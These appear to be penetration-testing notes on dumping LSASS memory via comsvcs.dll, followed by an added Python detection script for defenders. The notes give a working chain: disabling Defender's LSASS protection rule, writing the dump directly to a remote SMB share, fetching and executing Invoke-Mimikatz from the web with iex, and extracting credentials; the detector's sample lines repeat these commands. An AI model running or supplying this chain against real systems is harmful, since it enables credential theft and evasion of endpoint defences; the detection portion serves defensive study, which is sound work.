Dumping LSASS via ComSvcs works as of 10/29/2021
Disable the ASR rule that blocks credential stealing from LSASS
Set-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disable
Create a file share on Kali or elsewhere that you can immediately transfer the dump file to. We do this as some A/V and EDR solutions will delete the file if placed on disk.
smbserver.py share . -smb2support
From Windows:
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id \\192.168.1.44\share\lsass-comsvcs.dmp full
The file should be transferred to your machine now
Import Mimikatz to PowerShell on another Windows host machine (can also use something like Pypykatz on Kali)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
Change Mimikatz context to the LSASS dump
invoke-mimikatz -Command '"sekurlsa::minidump <directory>\lsass-comsvcs.dmp"'
Can then run Mimikatz commands against the dump
invoke-mimikatz -Command '"lsadump::lsa /patch"'
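Added example, not part of the original notes: defender-side triage of process-creation command lines (Sysmon Event ID 1, or Security 4688 with command-line auditing) for the ASR change and the comsvcs.dll dump shown above. The sample log lines, the PID, and the rule and function names are constructed for illustration.

```python
import re

# ASR rule GUID taken from the page (blocks credential stealing from lsass.exe).
LSASS_ASR_RULE = "9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2"

# Hypothetical rule names; patterns cover only the two commands shown above.
RULES = {
    # Set-MpPreference naming the LSASS rule with a Disable/Disabled/0 action.
    "asr_lsass_rule_disabled": re.compile(
        r"Set-MpPreference\b(?=.*" + re.escape(LSASS_ASR_RULE) + r")"
        r"(?=.*-AttackSurfaceReductionRules_Actions\s+(?:Disabled?|0)\b)",
        re.IGNORECASE),
    # rundll32 loading comsvcs.dll and calling its MiniDump export.
    "comsvcs_minidump": re.compile(
        r"rundll32(?:\.exe)?\b.*\bcomsvcs(?:\.dll)?\b.*\bMiniDump\b",
        re.IGNORECASE),
}
# A .dmp output path on a UNC share: the dump leaves the host as it is written.
UNC_DUMP = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+\\\S+\.dmp\b", re.IGNORECASE)

def triage(command_lines):
    """Return (line_no, rule_name, remote_dump_path_or_None) per match."""
    findings = []
    for no, cmd in enumerate(command_lines, 1):
        for name, rx in RULES.items():
            if rx.search(cmd):
                unc = UNC_DUMP.search(cmd)
                findings.append((no, name, unc.group(0) if unc else None))
    return findings

# Constructed sample command lines (PID 624 is made up).
SAMPLE = [
    r"powershell.exe Set-MpPreference -AttackSurfaceReductionRules_Ids "
    r"9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disable",
    r"C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, "
    r"MiniDump 624 \\192.168.1.44\share\lsass-comsvcs.dmp full",
    r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r"powershell.exe Set-MpPreference -AttackSurfaceReductionRules_Ids "
    r"9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Set-MpPreference typed into an already running PowerShell session shows up in script block logging (Event ID 4104) rather than in process creation, so those records can be passed through the same function.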